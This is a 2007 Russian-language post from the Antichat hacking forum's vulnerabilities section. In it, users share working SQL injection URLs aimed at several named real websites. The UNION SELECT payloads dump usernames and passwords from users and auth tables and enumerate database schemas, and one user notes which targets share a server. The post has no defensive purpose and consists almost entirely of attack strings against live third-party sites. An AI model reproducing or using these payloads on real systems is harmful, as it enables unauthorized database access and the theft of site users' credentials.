ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

sql
  #11  
Старый 17.08.2007, 14:34
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

Red_Red1 Calcutta

Цитата:
По моему тут надо таким способом, а иначе фильтрация работает...
http://wow.crpg.ru/article.php?sid=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(versi on(),0x71),0x71),5,6,7,8,9,10,11,12/*
З.Ы. Но дальше тоже не пошло
-->
Цитата:
http://wow.crpg.ru/article.php?sid=11+union+select+1,2,3,4,5,concat_w s(0x3a,uname,pass),7,8,9,0,1,2+From+users/*
вывода нет
но вывод есть здесь:
Цитата:
http://www.rolemancer.ru/sections.php?op=listarticles&secid=-69+union+select+1,2,concat(uname,0x3a,pass),4+from +users/*
ибо crpg.ru и rolemancer.ru на одном сервере

/ps/ антибоян http://antiboyansql.narod.ru/sql.txt

------------------------------------------------------------------------

DRoT1K
Цитата:
http://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
->
Цитата:
http://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,username ,password),8+from+user+limit+3500,1/*
-----------------
Цитата:
http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,3,4,5/*
->
Цитата:
http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,concat_ws(0x3a,table_schema,tab le_name,column_name),4,5+from+information_schema.c olumns+where+table_name=0x61757468+limit+1,1/*
авторизация
Цитата:
http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,concat_ws(0x3a,user,pass),4,5+f rom+auth+limit+0,1/*

Последний раз редактировалось Серенький; 17.08.2007 в 14:50..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ